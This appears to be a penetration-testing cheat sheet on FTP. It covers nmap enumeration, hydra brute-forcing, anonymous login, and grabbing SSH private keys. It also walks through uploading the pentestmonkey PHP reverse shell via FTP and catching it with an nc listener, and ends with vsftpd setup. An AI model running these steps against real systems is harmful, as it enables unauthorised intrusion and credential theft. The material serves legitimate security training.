# FTP (File Transfer Protocol) Pentesting ## FTP (File Transfer Protocol) Pentesting FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control). ### Enumeration ```shellscript nmap --script ftp-anon -p 21 nmap --script ftp-vuln* -p 21 nmap --script ftp-* -p 21 ``` #### Brute Force Credentials ```shellscript hydra -l username -P passwords.txt ftp hydra -L username.txt -p password ftp hydra -l username -P passwords.txt ftp:// hydra -L usernames.txt -p password ftp:// ``` ### Investigation #### Banner Grabbing ```shellscript nc 21 ``` #### Using OpenSSL First off, open listener. ```shellscript nc -vn 21 ``` Then run the command below. ```shellscript openssl s_client -connect :21 -starttls ftp ``` #### Configuration Files ```shellscript cat /etc/vsftpd.conf cat /etc/vsftpd/vsftpd.conf ``` ### Connect #### Using `ftp` ```shellscript ftp ftp

``` Sometimes we might be able to the **anonymous** login.\ Not likely, but worth a try. ```shellscript ftp username: anonymous password: anonymous ``` #### Using `lftp` `lftp` is the enhanced version of `ftp`. It's more easier to use than `ftp`. ```shellscript lftp lftp :-> connect # or lftp 10.0.0.1 # Login with username and password lftp 10.0.0.1:-> login username password ``` ### Commands in FTP After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.\ The FTP commands are almost the same as Linux commands. ```shellscript ftp> pwd ftp> cd ftp> ls # Print the content of the file ftp> get example.txt - # Switch to passive mode. ftp> passive # Print usage ftp> ? ``` #### Download Files To download files to local machine, ```shellscript ftp> get example.txt ftp> get home/user/.ssh/id_rsa ./id_rsa # recursive wget -r --user='username' --password='password' ftp:///sample ``` #### Upload Files ``` ftp> put example.txt ``` ### Reverse Shell over Website If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell. 1. **Download the Payload** Get the payload for the reverse shell from [this repository](https://github.com/pentestmonkey/php-reverse-shell). ```shellscript wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php # -------------------------------------------------------------------------------- # Edit some variables in shell.php $ip = ''; $port = 1234; ``` 2. **Upload the Payload to FTP Directory** Connect to FTP and upload the payload. ```shellscript ftp # Upload the payload you downloaded ftp> put shell.php ``` 3. **Get a Shell** At first, w need to open listener in your local machine. ```shellscript nc -lvnp 1234 ``` In a web browser, access to " We should get a target shell. ### Start FTP Server #### 1. Install vsftpd ```shellscript sudp apt install vsftpd ``` To check the config file for vsftpd, run the following command. ```shellscript less /etc/vsftpd.conf ``` #### 2. Start FTP Server Below are commands for starting FTP server and checking the status. ```shellscript sudo systemctl start vsftpd sudo systemctl status vsftpd ``` If you’ve updated the config file, you need to restart vsftpd. ```shellscript sudo systemctl restart vsftpd ```